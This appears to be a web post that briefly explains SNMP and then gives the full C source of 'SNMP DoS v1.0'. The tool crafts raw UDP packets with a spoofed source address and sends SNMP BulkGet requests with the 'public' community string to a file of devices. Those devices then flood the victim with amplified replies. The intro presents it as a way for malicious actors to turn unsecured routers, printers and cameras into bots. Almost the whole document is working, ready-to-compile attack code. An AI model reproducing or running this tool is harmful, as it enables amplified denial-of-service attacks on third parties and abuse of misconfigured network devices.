SNMP stands for Simple Network Management Protocol. It is used for collecting information from, and configuring, network devices, such as servers, printers, hubs, switches, and routers on an Internet Protocol network. What this script does is allow malicious actors to hijack unsecured network devices. These can be, but not limited to routers, printers, cameras, and sensors. It will use them as bots to attack the target.
Code:
/*
SNMP DoS v1.0
2.14.2005
fugi@bl.org
Sends a spoofed SNMP BulkGet .1.3.6.1 request to list of devices in file with community string public
equiv. command line is `snmpbulkget -v2c <device> public internet`
well, the target will get the first large packet, not the results of GetNext
generally it greatly amplifies the bandwidth
ADMsnmp can be easiy used with some shell scripting to scan class As for devices set to 'public'
Code modified from snmpkill.c and some taken from papasmurf.c
thanks kundera and tfreak
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in_systm.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
struct sockaddr_in dest;
int sok,i=0, count=0, loop=0, lcount=0;
char *source, *filename;
char c;
FILE *hostfile;
char buf[32];
u_long address[2048];
int num = 0, n;
char snmpkill[] =
"\x30\x24\x02\x01\x01\x04\x06\x70\x75\x62\x6c\x69\x63\xa5\x17\x02"
"\x04\x7b\x73\xcc\x13\x02\x01\x00\x02\x01\x64\x30\x09\x30\x07\x06"
"\x03\x2b\x06\x01\x05";
in_cksum (unsigned short *ptr, int nbytes)
{
register long sum; /* assumes long == 32 bits */
u_short oddbyte;
register u_short answer; /* assumes u_short == 16 bits */
/*
* Our algorithm is simple, using a 32-bit accumulator (sum),
* we add sequential 16-bit words to it, and at the end, fold back
* all the carry bits from the top 16 bits into the lower 16 bits.
*/
sum = 0;
while (nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}
/* mop up an odd byte, if necessary */
if (nbytes == 1)
{
oddbyte = 0; /* make sure top half is zero */
*((u_char *) & oddbyte) = *(u_char *) ptr; /* one byte only */
sum += oddbyte;
}
/*
* Add back carry outs from top 16 bits to low 16 bits.
*/
sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* ones-complement, then truncate to 16 bits */
return (answer);
}
void usage (void)
{
printf("SNMP DoS v1.0\n");
printf("Usage: snmpdos [-t target ip_addr] [-f host file] [-l loop count] \n");
}
void loadfile (void)
{
if ((hostfile = fopen(filename, "r")) == NULL)
{
perror("Opening hostfile");
exit(-1);
}
while (fgets(buf, sizeof buf, hostfile) != NULL)
{
char *p;
int valid;
/* skip over comments/blank lines */
if (buf[0] == '#' || buf[0] == '\n') continue;
/* get rid of newline */
buf[strlen(buf) - 1] = '\0';
/* check for valid address */
for (p = buf, valid = 1; *p != '\0'; p++)
{
if ( ! isdigit(*p) && *p != '.' )
{
fprintf(stderr, "Skipping invalid ip %s\n", buf);
valid = 0;
break;
}
}
/* if valid address, copy to our array */
if (valid)
{
address[num] = inet_addr(buf);
num++;
if (num == 2048)
break;
}
}
}
int sendit(ulong destaddr)
{
struct pseudoudp {
u_long ipsource;
u_long ipdest;
char zero;
char proto;
u_short length;
} *psudp;
struct in_addr sourceip_addr;
struct in_addr destip_addr;
struct ip *IP;
struct udphdr *UDP;
char *packet, *packetck, *data;
int datasize;
destip_addr.s_addr=destaddr;
sourceip_addr.s_addr=inet_addr(source);
dest.sin_addr.s_addr=destip_addr.s_addr;
datasize=sizeof(snmpkill);
packet = ( char * )malloc( 20 + 8 + datasize );
IP = (struct ip *)packet;
memset(packet,0,sizeof(packet));
IP->ip_dst.s_addr = destip_addr.s_addr;
IP->ip_src.s_addr = sourceip_addr.s_addr;
IP->ip_v = 4;
IP->ip_hl = 5;
IP->ip_ttl = 245;
IP->ip_id = htons(1047);
IP->ip_p = 17;
IP->ip_len = htons(20 + 8 + datasize);
IP->ip_sum = in_cksum((u_short *)packet,20);
UDP = (struct udphdr *)(packet+20);
UDP->source = htons(161);
UDP->dest = htons(161);
UDP->len = htons(8+datasize);
UDP->check = 0;
packetck = (char *)malloc(8 + datasize + sizeof(struct pseudoudp));
bzero(packetck,8 + datasize + sizeof(struct pseudoudp));
psudp = (struct pseudoudp *) (packetck);
psudp->ipdest = destip_addr.s_addr;
psudp->ipsource = sourceip_addr.s_addr;
psudp->zero = 0;
psudp->proto = 17;
psudp->length = htons(8+datasize);
memcpy(packetck+sizeof(struct pseudoudp),UDP,8+datasize);
memcpy(packetck+sizeof(struct pseudoudp)+8,snmpkill,datasize);
UDP->check = in_cksum((u_short *)packetck,8+datasize+sizeof(struct pseudoudp));
data = (unsigned char *)(packet+20+8);
memcpy(data,snmpkill,datasize);
return(sendto(sok,packet,20+8+datasize,0,(struct sockaddr *) &dest,sizeof(struct sockaddr)));
free(packet);
free(packetck);
}
int main(int argc,char **argv){
if(argc < 3) {
usage();
return 0;
}
while((c=getopt(argc,argv,"t:f:l:"))!=EOF){
switch(c) {
case 't': source=optarg; break;
case 'f': filename=optarg; break;
case 'l': loop=atoi(optarg); break;
default: usage();
}
}
loadfile();
dest.sin_family=AF_INET;
if ( (sok=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0)
{
printf("Can't create socket.\n");
exit(EXIT_FAILURE);
}
n=0;
while(lcount < loop){
while(n < num)
{
if(sendit(address[n]) == -1) printf ("SENDING ERROR!\n");
n++;
count++;
}
if(n == num){ n = 0; lcount++;}
}
printf("%i packets sent\n", count);
return 0;
}